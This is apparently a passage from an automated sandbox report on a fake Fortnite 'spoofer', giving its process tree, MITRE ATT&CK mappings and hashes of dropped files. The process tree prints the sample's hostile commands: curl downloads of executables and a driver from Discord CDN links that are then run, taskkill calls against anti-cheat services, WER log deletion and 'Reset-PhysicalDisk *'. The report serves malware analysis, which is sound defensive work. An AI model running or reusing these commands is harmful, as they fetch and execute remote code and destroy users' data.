    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\ProgramData\Microsoft\Windows\WER
    3⤵
    PID:5528
- C:\Users\Admin\AppData\Local\Temp\Koks_Cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\Koks_Cleaner.exe"
  2⤵
  - Executes dropped EXE
  PID:3512
- C:\Users\Admin\AppData\Local\Temp\AccuracyFN Swoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\AccuracyFN Swoofer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3676
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM EasyAntiCheatLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4304
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM EasyAntiCheatLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1552
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM BEService.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3908
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM BEService.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1448
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM Fortnite.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM Fortnite.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM BattleEyeLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4012
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM BattleEyeLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 0A
    3⤵
    PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c title n*E*x*O*s*S*p*O*o*F*e*R
    3⤵
    PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c CLS
    3⤵
    PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/905350016019882007/910675242425413662/FortniteClient-Win64-Shipping.exe --output C:\ProgramData\FortniteClient-Win64-Shipping.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4336
  - - C:\Windows\system32\curl.exe
      curl --silent https://cdn.discordapp.com/attachments/905350016019882007/910675242425413662/FortniteClient-Win64-Shipping.exe --output C:\ProgramData\FortniteClient-Win64-Shipping.exe
      4⤵
      Blocklisted process makes network request
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/905350016019882007/910674352582852608/Null.sys --output C:\ProgramData\Null.sys
    3⤵
    PID:6124
  - - C:\Windows\system32\curl.exe
      curl --silent https://cdn.discordapp.com/attachments/905350016019882007/910674352582852608/Null.sys --output C:\ProgramData\Null.sys
      4⤵
      PID:5192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/912536556047310934/912605439047381022/lol.exe --output C:\ProgramData\lol.exe
    3⤵
    PID:1476
  - - C:\Windows\system32\curl.exe
      curl --silent https://cdn.discordapp.com/attachments/912536556047310934/912605439047381022/lol.exe --output C:\ProgramData\lol.exe
      4⤵
      PID:5396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cd C:\ProgramData\
    3⤵
    PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\ProgramData\FortniteClient-Win64-Shipping.exe C:\ProgramData\Null.sys
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\ProgramData\lol.exe
    3⤵
    PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Reset-PhysicalDisk * >nul 2>&1
    3⤵
    PID:1208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Reset-PhysicalDisk *
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 0A
    3⤵
    PID:6108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c title n*E*x*O*s*S*p*O*o*F*e*R
    3⤵
    PID:5684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c CLS
    3⤵
    PID:5548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/905350016019882007/910675242425413662/FortniteClient-Win64-Shipping.exe --output C:\ProgramData\FortniteClient-Win64-Shipping.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1128
  - - C:\Windows\system32\curl.exe
      curl --silent https://cdn.discordapp.com/attachments/905350016019882007/910675242425413662/FortniteClient-Win64-Shipping.exe --output C:\ProgramData\FortniteClient-Win64-Shipping.exe
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/905350016019882007/910674352582852608/Null.sys --output C:\ProgramData\Null.sys
    3⤵
    PID:2780
  - - C:\Windows\system32\curl.exe
      curl --silent https://cdn.discordapp.com/attachments/905350016019882007/910674352582852608/Null.sys --output C:\ProgramData\Null.sys
      4⤵
      PID:5960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/912536556047310934/912605439047381022/lol.exe --output C:\ProgramData\lol.exe
    3⤵
    PID:3480
  - - C:\Windows\system32\curl.exe
      curl --silent https://cdn.discordapp.com/attachments/912536556047310934/912605439047381022/lol.exe --output C:\ProgramData\lol.exe
      4⤵
      PID:6024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cd C:\ProgramData\
    3⤵
    PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\ProgramData\FortniteClient-Win64-Shipping.exe C:\ProgramData\Null.sys
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:6060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\ProgramData\lol.exe
    3⤵
    PID:5532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Reset-PhysicalDisk * >nul 2>&1
    3⤵
    PID:5792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Reset-PhysicalDisk *
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3480

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4488

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5252

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5336

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k smphost
1⤵
PID:1640

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4856

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3392

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv rTLzUz2kP0OO32Gym9xQNg.0.2
1⤵
- Blocklisted process makes network request
PID:6080

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:5340

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Data Destruction

T1485

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\FortniteClient-Win64-Shipping.exe

Filesize
36B

MD5
a1ca4bebcd03fafbe2b06a46a694e29a

SHA1
ffc88125007c23ff6711147a12f9bba9c3d197ed

SHA256
c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

SHA512
6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\BrowserMetrics\BrowserMetrics-6703B2B7-364.pma

Filesize
4.0MB

MD5
83a0cdc13ddaf8c86c3f872f726d710e

SHA1
0fe68f236ef77fc35cc314f464b43e7a765e12f5

SHA256
9ebb1d2c7ba04b720f41b21509885f16360428713c2915d9fcd372f28119b85a

SHA512
8b6de5980a9497996c32fe14651cf224b9008f6d2924baac54f205efadf35d1a6a00117f23f3983d170fb10e048897b086af88d82c56704bf9ee0ebae1e69152

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\CrashpadMetrics-active.pma

Filesize
1024KB

MD5
9a31b075da019ddc9903f13f81390688

SHA1
d5ed5d518c8aad84762b03f240d90a2d5d9d99d3

SHA256
95cf4025babcd46069b425449c98ed15d97d364b2461417caa9aa0c13cb372e1

SHA512
a04726a429ae727d685f0836327c625d2f18d6327253216a9a31265a324b68b06bec4e7f1b744d261a0e67fa0a90c43719aeda9d2998f42525b0ff5640c7bf1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Crashpad\settings.dat

Filesize
40B

MD5
db9149f34c6cfa44d2668a52f26b5b7f

SHA1
f8cd86ce3eed8a75ff72c1e96e815a9031856ae7

SHA256
632789cdfa972eec9efe17d8e2981c0298cf6bd5a7e5dad3cbdcf7bb30f2e47f

SHA512
169b56304747417e0afe6263dd16415d3a64fff1b5318cd4a919005abe49ca213537e85a2f2d2291ea9dc9a48ea31c001e8e09e24f25304ae3c2cfefad715ce9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Affiliation Database

Filesize
52KB

MD5
abd5f8ea3d9a79d25ad874145769b9fd

SHA1
0e5cb55791194d802b3d3983be3a34d364d7a78d

SHA256
50e624ab71e65f7bff466e9066621f0ee85e87f74eacd85f1952433294e1c5fd

SHA512
19126380f34e2a2517fda41cb1b824b4a0fb467b60126120deab669288fc3e851da481655dc1887f17762b6394957c4bee882dc233f7564433e25d947c80e66b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\BrowsingTopicsSiteData

Filesize
28KB

MD5
2fc3609b37500f785639ae7217b67a67

SHA1
f63d3b9b2e8eb98177742ebbccf2a18a64df33b3

SHA256
fae90e262589b5b22a1cd522972f9de32e9b0ee1a2df42aaa411437e5a49d753

SHA512
508fdfca95103f4213999eebe20c5d82bedfb01f01129538bfa7394556ca67b528322f662bf3128ca87e3ac0f0f58fb42345acda49ab67ba1d763084cf5ab05b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\BrowsingTopicsState

Filesize
414B

MD5
55b8c802d66972f3892cdfb28b47cd95

SHA1
1e10356c5cbf850d795e0d855754e3714eb609b8

SHA256
3fa0a606dbde7d78bfc1e227590f1334f8f9059e9265205c15e3630d0705cdd5

SHA512
4b5aa7799bd737e0bac9522f0986dc2ebc05e2782bdc9ddb6a02431da9cf183b2b5a819899ddb6717636d8d46ecb23ed8fa5f8e09793e11de65a0354fd00655d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\data_0

Filesize
44KB

MD5
b7dcc95c633af861899171697666aaa9

SHA1
2eccf87a09bca1b009079c07cae97e5d8f312518

SHA256
a1c4e396c0addc85ed01bba36effef4c5d9b9b2456d9f3305e82de6fa2f77721

SHA512
0c4c49ed97fd58a34be51895f21b9a68150003845ab26298dc7b467a92149b53dc94ab8024dc4cbcd4abc4c2bada201ed6733b79a5e0bb89fcffb7a24dd3532a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\data_1

Filesize
264KB

MD5
afbf15e2549191f35d9034d9ccd5cde4

SHA1
092d6b8a3a9599edd629e495bf306e691acec22f

SHA256
b5818eb0edf552fa359d76b95b262ab7f9fcc7cd68f6fa6ea543930d092d46fa

SHA512
c3bfd47bf3348bd6d8e37067bff12f1d79fa98f7e365a61bee1d101ac4c4d11b41576e5407f4395e64b6efd5da8152a5532a92750cb849cba4618f6e2817cd02

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\data_2

Filesize
1.0MB

MD5
727ddba6c69d2e855820b57ad8a5cda7

SHA1
2d53b1c7e3ab91a0c3a33cfcf75b7d9d3bf1e202

SHA256
20b34e761ac58e4c1d3be056e0ca65e1372143e4dd4fad25c19f1f45f2e2fc19

SHA512
e3137d4f4b872046c2c0edf72b4a8f14751a2f265ae0703409a78ff2bd54f877924ec445b550e69d09171503cf47e6ddbbd341cfa7e935fb985add2545d3bc98

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\data_3

Filesize
4.0MB

MD5
bd20901031aea37b603dfdab18804122

SHA1
cc44a36d57cf6f4a96b496782cc8fc7505398b49

SHA256
6066c0654c89a4f249a5be4a5246d6590cd17979fd0bc1bd6592437deb3fd315

SHA512
8d4ea927abcb17d60edfc5a9b2dad3fee5a4432d122a004cc46e32ca615e380b44d74bdf4e9511da72fa777b5c3cff8d4e5a229d749aa184b52514ad182dc3c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\f_000002

Filesize
62KB

MD5
9666d74b18f57389ee2d3dee5073f71a

SHA1
1830bc2670e616a1da1af27157159e6677a5ad63

SHA256
6fcb1e788f9a12b8ad937172802c41475f2180906db38d6507a3af6a2b721cae

SHA512
69ea6d6080b3ac00f4c4fcf9e00c9e16bd2c3373073f7dde3b1735fabeaaed1e7f8b76113e5ed2b9df08d089ca33ec367c595312f0c2f6e0fbad364464bc989b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\f_000003

Filesize
41KB

MD5
abda4d3a17526328b95aad4cfbf82980

SHA1
f0e1d7c57c6504d2712cec813bc6fd92446ec9e8

SHA256
ee22a58fa0825364628a7618894bcacb1df5a6a775cafcfb6dea146e56a7a476

SHA512
91769a876df0aea973129c758d9a36b319a9285374c95ea1b16e9712f9aa65a1be5acf996c8f53d8cae5faf68e4e5829cd379f523055f8bcfaa0deae0d729170

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\f_000004

Filesize
36KB

MD5
67122b5a897170026442021bccee23c4

SHA1
4903972e82990afa6f6a97a549fef1ed1c668acd

SHA256
3c7bdeefe30e1facbc0afcce333fdbbd8ec04c171838119b33778facd8752d10

SHA512
266b0e095a2d4b01834b9fac443b387a60ab2bd67de81ea222ed0525cad8558a7599d9377d10d71b4a1406a6f4ef800a35ecc758698c12836916ffe6ab58ae38

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\index

Filesize
512KB

MD5
dcfee59dc730c4945966bbe8bba08dc6

SHA1
7b29b134b6fedc0df14e0d049945a66e2978e608

SHA256
632e08ab451a43f959820bde3bbeb55d65ae5a092643aa348424d540de38bd20

SHA512
30dbdbf68ae71f26fc7bdf32fce3bd1afc7a85b38786653040f9e4f71ec32dd4cf0eb3e389de6b6ea01bc417741d285518c0fbb9835f8b11e1c7b9af6dc61fd8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Code Cache\js\7018b8cf1c3b00c7_0

Filesize
306B

MD5
d8dff042cbbf3de3d40f1da2fed0611c

SHA1
a0601f22fbf88aff3380fa97b77abcc94c24c00d

SHA256
8e2a8e53be64090452827b1f8da20f0f03a68bc7acb5cda768b00be639011974

SHA512
b9da84116186541507f0446e9c49d7a16ff1845385899e24045f427a0f297638a70cd434bcaee7b835abb319a6a6560fada26cdff01225e1a835af51900dcd4f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Code Cache\js\ba678a2fbd8c358c_0

Filesize
298B

MD5
e28c2a53a98dc766d230fb63f8044c24

SHA1
dec848c9bb851afde7508c0a7df61b2ae9992911

SHA256
a02918034824eab04a4edd0774b13b82d375a1a8163cd116534cf9f7d883e826

SHA512
f12976e36cfbfbc1c9d0ed77904785b1d301018669975b3c98500df6769f84f762034d6e6218f9d888315891678e8b4e7f362b3809f0987f845e7dac30333a25

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Code Cache\js\index-dir\the-real-index

Filesize
96B

MD5
6c378c59495467a7c9650ed318426f6c

SHA1
1ce5352ed5ee3d2a2377b3c33deec5b50505360a

SHA256
7583793047d1f1ad1efd8b9ab4189076700b03b3bc025495ab2bea521bf15aec

SHA512
c8908ef8c95c17bc052632ec09e49da2beecc004ab4c3bb34659309f6bb51a29217163f3a102a7d717ec7af3ef7056bb38f420298790d6c241c042dae48c1918

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
ecbbc1dd939d7dd93bee53acb589d72e

SHA1
0c868313c379ca884df86b7b5ba31c6643d6182b

SHA256
7b2d87cddc540088174cdd66f15ff507876c535158d1da51f0e432d137bba967

SHA512
b0482687338387f274f9de83ca27b43d9627efa00db5fe8d6b12ab94b50491c802212c848542fc051b72b7291be51b134c5ce797ec61034fe8e72babf0b07329

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\databases\Databases.db

Filesize
28KB

MD5
315332044706528a5fe8a6dde075f0b3

SHA1
00afb7ad87d6b357f2ab8d7717a67951a2a9f0aa

SHA256
05cf19b9848e82ca48587087b680ad6e5bf0c898e9505125e3b6ef46f7371d75

SHA512
6e8553ab19864090437b9c006832a704cd3afde129af4b272598ca0e1da81e473aed4add82f857bfce30042924fe6072958e766d7154c8d70ce0ba8ab6744fe6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\GraphiteDawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NetworkEX.exe.log

Filesize
1KB

MD5
f39f39c226ceafd197ec727555ad4006

SHA1
b8b23087b757f6deadc134f183cbaad1dfb9a0cf

SHA256
af297a367f79530d10cdd5aeb97b4ec01d59ad5c4e1dddd6cdc9815f95d0b2c0

SHA512
a33739e4a1115c3a89dbe9c44bf8b6a2e10ec484de3061b2d45b76116859d7c36513d82a5e42533ea4c71248ab1e6b8083662af31a92d12b097d191293a4ef27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
a43e653ffb5ab07940f4bdd9cc8fade4

SHA1
af43d04e3427f111b22dc891c5c7ee8a10ac4123

SHA256
c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

SHA512
62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a0486d6f8406d852dd805b66ff467692

SHA1
77ba1f63142e86b21c951b808f4bc5d8ed89b571

SHA256
c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

SHA512
065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dc058ebc0f8181946a312f0be99ed79c

SHA1
0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

SHA256
378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

SHA512
36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
215KB

MD5
e579aca9a74ae76669750d8879e16bf3

SHA1
0b8f462b46ec2b2dbaa728bea79d611411bae752

SHA256
6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

SHA512
df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
1ace3a575818165ad19fee257c0f61a9

SHA1
16c8020fdb91e5e54e072b69566823f0af42d46a

SHA256
5c64ab265e86709c350dbcf810d1ff5f53ef30bf2f09ab223b7ab4365c8c0ad7

SHA512
53a150cf7f3ca69cce3fedd65cf26df645230e2ca921894a43729bff3610631a9f45c479e42a8485cf73d6d2aba40d4025d74a38728e2b8dcff3c8ed65fe9132

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e6b6b9761fa4f945cd66e245e1b4f8fc

SHA1
564c363d9981e466f20f1012fea1816b4edf748e

SHA256
d55143e1dbc9174274289a586e58502c64e46dce7593c417074d970d73eac905

SHA512
c1789af7e69ac3aae76c6b0776cf00e0bd2ca0870b6b97b0bf720b0bff0d3132b9f341203f47a346d5ef4ff29a86a12fd1431f2be1b0fb247fead4d5524289a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ef29f8ba9b026a6e788682e091072f86

SHA1
e2386291eaec6e37bcb5754825a47ff7af8842c3

SHA256
111f9dd089e835902ee4062af3ea8d88647761444869b2dc6c30f0ce14df47d3

SHA512
17cdd3a95b433af8d9c87e8190b16e9135b1d52ab292a4022a2cb20bbcd5b4aabada5a31e003cd807eeb77990d63e5675b7d70b210794292f941fd39bdbb73ea

